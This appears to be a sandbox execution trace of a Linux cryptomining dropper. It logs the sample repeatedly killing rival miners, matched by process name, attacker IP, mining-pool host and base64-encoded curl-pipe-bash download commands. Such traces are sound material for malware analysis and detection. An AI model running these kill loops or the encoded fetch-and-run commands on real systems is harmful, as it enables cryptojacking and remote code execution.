2⤵
PID:669

/bin/ps
ps aux
2⤵
PID:668

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:670

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:671

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:672

/bin/ps
ps aux
2⤵
PID:673

/bin/grep
grep -v grep
2⤵
PID:674

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:675

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:677

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:676

/bin/grep
grep -v grep
2⤵
PID:679

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:678

/bin/grep
grep nqscheduler
2⤵
PID:680

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:682

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:681

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:683

/bin/grep
grep -v grep
2⤵
PID:684

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:685

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:687

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:686

/bin/grep
grep -v grep
2⤵
PID:689

/bin/ps
ps aux
2⤵
PID:688

/bin/grep
grep -v aux
2⤵
PID:690

/bin/grep
grep "]"
2⤵
PID:691

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:692

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:693

/bin/grep
grep -v grep
2⤵
PID:695

/bin/ps
ps aux
2⤵
PID:694

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:696

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:698

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:697

/bin/ps
ps aux
2⤵
PID:699

/bin/grep
grep 0kwti6ut420t
2⤵
PID:701

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:702

/bin/grep
grep -v grep
2⤵
PID:700

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:703

/bin/grep
grep -v grep
2⤵
PID:705

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:704

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:706

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:707

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:708

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:709

/bin/grep
grep -v grep
2⤵
PID:710

/bin/grep
grep -v /
2⤵
PID:711

/bin/grep
grep -v -
2⤵
PID:712

/bin/grep
grep -v _
2⤵
PID:713

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:714

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:715

/bin/grep
grep -v grep
2⤵
PID:717

/bin/grep
grep "\\[^"
2⤵
PID:718

/bin/ps
ps aux
2⤵
PID:716

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:719

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:720

/bin/grep
grep -v grep
2⤵
PID:722

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:721

/bin/grep
grep rsync
2⤵
PID:723

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:724

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:725

/bin/grep
grep -v grep
2⤵
PID:727

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:726

/bin/grep
grep watchd0g
2⤵
PID:728

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:729

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:730

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:731

/bin/grep
grep -v grep
2⤵
PID:732

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:735

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:734

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
- Writes file to system bin folder
PID:733

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:733

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:739

/bin/grep
grep -v grep
2⤵
PID:737

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:738

/bin/ps
ps aux
2⤵
PID:736

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:740

/bin/grep
grep -v grep
2⤵
PID:742

/bin/ps
ps aux
2⤵
PID:741

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:744

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:745

/bin/grep
grep /tmp/java
2⤵
PID:743

/bin/grep
grep -v grep
2⤵
PID:747

/bin/ps
ps aux
2⤵
PID:746

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:749

/bin/grep
grep gitee.com
2⤵
PID:748

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:750

/bin/grep
grep -v grep
2⤵
PID:752

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:751

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:754

/bin/grep
grep /tmp/java
2⤵
PID:753

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:755

/bin/grep
grep 104.248.4.162
2⤵
PID:758

/bin/grep
grep -v grep
2⤵
PID:757

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:756

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:759

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:760

/bin/grep
grep -v grep
2⤵
PID:762

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:761

/bin/grep
grep 89.35.39.78
2⤵
PID:763

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:764

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:765

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:766

/bin/grep
grep -v grep
2⤵
PID:767

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:769

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:768

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:770

/bin/grep
grep -v grep
2⤵
PID:772

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:774

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:771

/bin/grep
grep kthrotlds
2⤵
PID:773

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:775

/bin/grep
grep ksoftirqds
2⤵
PID:778

/bin/grep
grep -v grep
2⤵
PID:777

/bin/ps
ps aux
2⤵
PID:776

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:779

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:780

/bin/grep
grep -v grep
2⤵
PID:782

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:784

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:781

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:785

/bin/grep
grep netdns
2⤵
PID:783

/bin/grep
grep -v grep
2⤵
PID:787

/bin/grep
grep watchdogs
2⤵
PID:788

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:789

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:786

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:790

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:791

/bin/grep
grep -v grep
2⤵
PID:792

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:794

/bin/grep
grep kdevtmpfsi
2⤵
PID:793

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:795

/bin/ps
ps aux
2⤵
PID:796

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:799

/bin/grep
grep -v grep
2⤵
PID:797

/bin/grep
grep kinsing
2⤵
PID:798

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:800

/bin/grep
grep redis2
2⤵
PID:803

/bin/grep
grep -v grep
2⤵
PID:802

/bin/ps
ps aux
2⤵
PID:801

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:804

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:805

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:806

/bin/grep
grep -v grep
2⤵
PID:807

/bin/grep
grep -v aux
2⤵
PID:808

/bin/grep
grep " ps"
2⤵
PID:809

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:810

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:811

/bin/grep
grep -v grep
2⤵
PID:813

/bin/ps
ps aux
2⤵
PID:812

/bin/grep
grep sync_supers
2⤵
PID:814

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:816

/usr/bin/cut
cut -c 9-15
2⤵
PID:815

/bin/grep
grep -v grep
2⤵
PID:818

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:817

/bin/grep
grep cpuset
2⤵
PID:819

/usr/bin/cut
cut -c 9-15
2⤵
PID:820

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:821

/bin/ps
ps aux
2⤵
PID:822

/bin/grep
grep -v grep
2⤵
PID:823

/bin/grep
grep -v aux
2⤵
PID:824

/bin/grep
grep "x]"
2⤵
PID:825

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:826

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:827

/bin/grep
grep -v grep
2⤵
PID:829

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:828

/bin/grep
grep -v aux
2⤵
PID:830

/bin/grep
grep "sh] <"
2⤵
PID:831

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:832

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:833

/bin/grep
grep -v grep
2⤵
PID:835

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:834

/bin/grep
grep -v aux
2⤵
PID:836

/bin/grep
grep " \\[]"
2⤵
PID:837

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:838

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:839

/bin/grep
grep -v grep
2⤵
PID:841

/bin/grep
grep /tmp/l.sh
2⤵
PID:842

/bin/ps
ps aux
2⤵
PID:840

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:843

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:844

/bin/grep
grep -v grep
2⤵
PID:846

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:848

/bin/ps
ps aux
2⤵
PID:845

/bin/grep
grep /tmp/zmcat
2⤵
PID:847

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:849

/bin/grep
grep -v grep
2⤵
PID:851

/bin/grep
grep hahwNEdB
2⤵
PID:852

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:853

/bin/ps
ps aux
2⤵
PID:850

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:854

/bin/grep
grep -v grep
2⤵
PID:856

/bin/ps
ps aux
2⤵
PID:855

/bin/grep
grep CnzFVPLF
2⤵
PID:857

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:858

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:859

/bin/grep
grep -v grep
2⤵
PID:861

/bin/ps
ps aux
2⤵
PID:860

/bin/grep
grep CvKzzZLs
2⤵
PID:862

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:863

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:864

/bin/grep
grep -v grep
2⤵
PID:866

/bin/ps
ps aux
2⤵
PID:865

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:867

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:868

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:869

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:870

/bin/grep
grep /tmp/udevd
2⤵
PID:872

/bin/grep
grep -v grep
2⤵
PID:871

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:874

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:873

/bin/grep
grep -v grep
2⤵
PID:876

/bin/ps
ps aux
2⤵
PID:875

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:877

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:879

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:878

/bin/grep
grep -v grep
2⤵
PID:881

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:880

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:883

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:884

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:882

/bin/ps
ps aux
2⤵
PID:885

/bin/grep
grep -v grep
2⤵
PID:886

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:889

/bin/grep
grep sustse
2⤵
PID:887

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:888

/bin/ps
ps aux
2⤵
PID:890

/bin/grep
grep -v grep
2⤵
PID:891

/bin/grep
grep sustse3
2⤵
PID:892

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:894

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:893

/bin/grep
grep -v grep
2⤵
PID:896

/bin/ps
ps aux
2⤵
PID:895

/bin/grep
grep mr.sh
2⤵
PID:897

/bin/grep
grep wget
2⤵
PID:898

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:899

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:900

/bin/grep
grep -v grep
2⤵
PID:902

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:901

/bin/grep
grep mr.sh
2⤵
PID:903

/bin/grep
grep curl
2⤵
PID:904

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:905

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:906

/bin/grep
grep -v grep
2⤵
PID:908

/bin/ps
ps aux
2⤵
PID:907

/bin/grep
grep wget
2⤵
PID:910

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:911

/bin/grep
grep 2mr.sh
2⤵
PID:909

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:912

/bin/grep
grep -v grep
2⤵
PID:914

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:913

/bin/grep
grep 2mr.sh
2⤵
PID:915

/bin/grep
grep curl
2⤵
PID:916

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:917

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:918

/bin/grep
grep -v grep
2⤵
PID:920

/bin/grep
grep cr5.sh
2⤵
PID:921

/bin/ps
ps aux
2⤵
PID:919

/bin/grep
grep wget
2⤵
PID:922

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:924

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:923

/bin/grep
grep -v grep
2⤵
PID:926

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:925

/bin/grep
grep cr5.sh
2⤵
PID:927

/bin/grep
grep curl
2⤵
PID:928

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:929

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:930

/bin/grep
grep -v grep
2⤵
PID:932

/bin/ps
ps aux
2⤵
PID:931

/bin/grep
grep wget
2⤵
PID:934

/bin/grep
grep logo9.jpg
2⤵
PID:933

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:936

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:935

/bin/grep
grep -v grep
2⤵
PID:938

/bin/ps
ps aux
2⤵
PID:937

/bin/grep
grep curl
2⤵
PID:940

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:942

/bin/grep
grep logo9.jpg
2⤵
PID:939

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:941

/bin/grep
grep -v grep
2⤵
PID:944

/bin/grep
grep j2.conf
2⤵
PID:945

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:946

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:943

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:947

/bin/ps
ps aux
2⤵
PID:948

/bin/grep
grep wget
2⤵
PID:951

/bin/grep
grep -v grep
2⤵
PID:949

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:952

/bin/grep
grep luk-cpu
2⤵
PID:950

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:953

/bin/ps
ps aux
2⤵
PID:954

/bin/grep
grep curl
2⤵
PID:957

/bin/grep
grep -v grep
2⤵
PID:955

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:958

/bin/grep
grep luk-cpu
2⤵
PID:956

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:959

/bin/ps
ps aux
2⤵
PID:960

/bin/grep
grep -v grep
2⤵
PID:961

/bin/grep
grep ficov
2⤵
PID:962

/bin/grep
grep wget
2⤵
PID:963

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:964

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:965

/bin/grep
grep -v grep
2⤵
PID:967

/bin/grep
grep curl
2⤵
PID:969

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:966

/bin/grep
grep ficov
2⤵
PID:968

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:971

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:970

/bin/grep
grep he.sh
2⤵
PID:974

/bin/grep
grep -v grep
2⤵
PID:973

/bin/grep
grep wget
2⤵
PID:975

/bin/ps
ps aux
2⤵
PID:972

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:977

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:976

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:978

/bin/grep
grep he.sh
2⤵
PID:980

/bin/grep
grep -v grep
2⤵
PID:979

/bin/grep
grep curl
2⤵
PID:981

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:982

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:983

/bin/grep
grep -v grep
2⤵
PID:985

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:984

/bin/grep
grep wget
2⤵
PID:987

/bin/grep
grep miner.sh
2⤵
PID:986

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:988

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:989

/bin/grep
grep -v grep
2⤵
PID:991

/bin/grep
grep miner.sh
2⤵
PID:992

/bin/ps
ps aux
2⤵
PID:990

/bin/grep
grep curl
2⤵
PID:993

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:994

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:995

/bin/grep
grep nullcrew
2⤵
PID:998

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:996

/bin/grep
grep -v grep
2⤵
PID:997

/bin/grep
grep wget
2⤵
PID:999

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1000

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1001

/bin/grep
grep -v grep
2⤵
PID:1003

/bin/ps
ps aux
2⤵
PID:1002

/bin/grep
grep curl
2⤵
PID:1005

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1006

/bin/grep
grep nullcrew
2⤵
PID:1004

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1007

/bin/ps
ps aux
2⤵
PID:1008

/bin/grep
grep -v grep
2⤵
PID:1009

/bin/grep
grep 107.174.47.156
2⤵
PID:1010

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1011

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1012

/bin/grep
grep 83.220.169.247
2⤵
PID:1015

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1016

/bin/grep
grep -v grep
2⤵
PID:1014

/bin/ps
ps aux
2⤵
PID:1013

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1017

/bin/grep
grep -v grep
2⤵
PID:1019

/bin/grep
grep 51.38.203.146
2⤵
PID:1020

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1018

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1021

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1022

/bin/grep
grep -v grep
2⤵
PID:1024

/bin/ps
ps aux
2⤵
PID:1023

/bin/grep
grep 144.217.45.45
2⤵
PID:1025

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1027

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1026

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1028

/bin/grep
grep -v grep
2⤵
PID:1029

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1031

/bin/grep
grep 107.174.47.181
2⤵
PID:1030

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1032

/bin/grep
grep -v grep
2⤵
PID:1034

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1036

/bin/ps
ps aux
2⤵
PID:1033

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1037

/bin/grep
grep 176.31.6.16
2⤵
PID:1035

/bin/ps
ps auxf
2⤵
PID:1038

/bin/grep
grep -v grep
2⤵
PID:1039

/bin/grep
grep mine.moneropool.com
2⤵
PID:1040

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1041

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1042

/bin/grep
grep -v grep
2⤵
PID:1044

/bin/ps
ps auxf
2⤵
PID:1043

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1046

/bin/grep
grep pool.t00ls.ru
2⤵
PID:1045

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1047

/bin/grep
grep -v grep
2⤵
PID:1049

/bin/ps
ps auxf
2⤵
PID:1048

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:1050

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1051

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1052

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:1055

/bin/grep
grep -v grep
2⤵
PID:1054

/bin/ps
ps auxf
2⤵
PID:1053

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1057

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1056

/bin/grep
grep -v grep
2⤵
PID:1059

/bin/grep
grep "[email protected]"
2⤵
PID:1060

/bin/ps
ps auxf
2⤵
PID:1058

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1061

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1062

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1063

/bin/grep
grep -v grep
2⤵
PID:1064

/bin/grep
grep monerohash.com
2⤵
PID:1065

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1066

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1067

/bin/grep
grep -v grep
2⤵
PID:1069

/bin/ps
ps auxf
2⤵
PID:1068

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:1070

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1072

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1071

/bin/grep
grep -v grep
2⤵
PID:1074

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1073

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:1075

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1076

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1077

/bin/grep
grep -v grep
2⤵
PID:1079

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1078

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:1080

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1081

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1082

/bin/grep
grep -v grep
2⤵
PID:1084

/bin/ps
ps auxf
2⤵
PID:1083

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:1085

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1086

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1087

/bin/grep
grep -v grep
2⤵
PID:1089

/bin/ps
ps auxf
2⤵
PID:1088

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:1090

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1091

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1092

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1093

/bin/grep
grep -v grep
2⤵
PID:1094

/bin/grep
grep xmrpool.eu
2⤵
PID:1095

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1096

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1097

/bin/ps
ps auxf
2⤵
PID:1098

/bin/grep
grep -v grep
2⤵
PID:1099

/bin/grep
grep kieuanilam.me
2⤵
PID:1100

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1101

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1102

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1105

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1103

/bin/grep
grep xiaoyao
2⤵
PID:1104

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1106

/usr/local/sbin/kill
kill -9 1104
3⤵
PID:1107

/usr/local/bin/kill
kill -9 1104
3⤵
PID:1107

/usr/sbin/kill
kill -9 1104
3⤵
PID:1107

/usr/bin/kill
kill -9 1104
3⤵
PID:1107

/sbin/kill
kill -9 1104
3⤵
PID:1107

/bin/kill
kill -9 1104
3⤵
- Reads CPU attributes
PID:1107

/bin/grep
grep xiaoxue
2⤵
PID:1109

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1111

/usr/local/sbin/kill
kill -9 1109
3⤵
PID:1112

/usr/local/bin/kill
kill -9 1109
3⤵
PID:1112

/usr/sbin/kill
kill -9 1109
3⤵
PID:1112

/usr/bin/kill
kill -9 1109
3⤵
PID:1112

/sbin/kill
kill -9 1109
3⤵
PID:1112

/bin/kill
kill -9 1109
3⤵
- Reads CPU attributes
PID:1112

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1108

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1110

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1115

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1116

/bin/grep
grep 46.243.253.15
2⤵
PID:1114

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1118

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1117

/bin/grep
grep 176.31.6.16
2⤵
PID:1120

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1121

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1122

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1123

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1124

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1126

/usr/bin/pgrep
pgrep -f L2Jpbi9iYXN
2⤵
PID:1125

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1128

/usr/bin/pgrep
pgrep -f xzpauectgr
2⤵
PID:1127

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1130

/usr/bin/pgrep
pgrep -f slxfbkmxtd
2⤵
PID:1129

/usr/bin/pgrep
pgrep -f mixtape
2⤵
PID:1131

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1132

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1134

/usr/bin/pgrep
pgrep -f addnj
2⤵
PID:1133

/usr/bin/pgrep
pgrep -f 200.68.17.196
2⤵
PID:1135

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1136

/usr/bin/pgrep
pgrep -f IyEvYmluL3NoCgpzUG
2⤵
- Reads CPU attributes
PID:1137

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1138

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1140

/usr/bin/pgrep
pgrep -f KHdnZXQgLXFPLSBodHRw
2⤵
- Reads runtime system information
PID:1139

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1142

/usr/bin/pgrep
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
2⤵
PID:1141

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
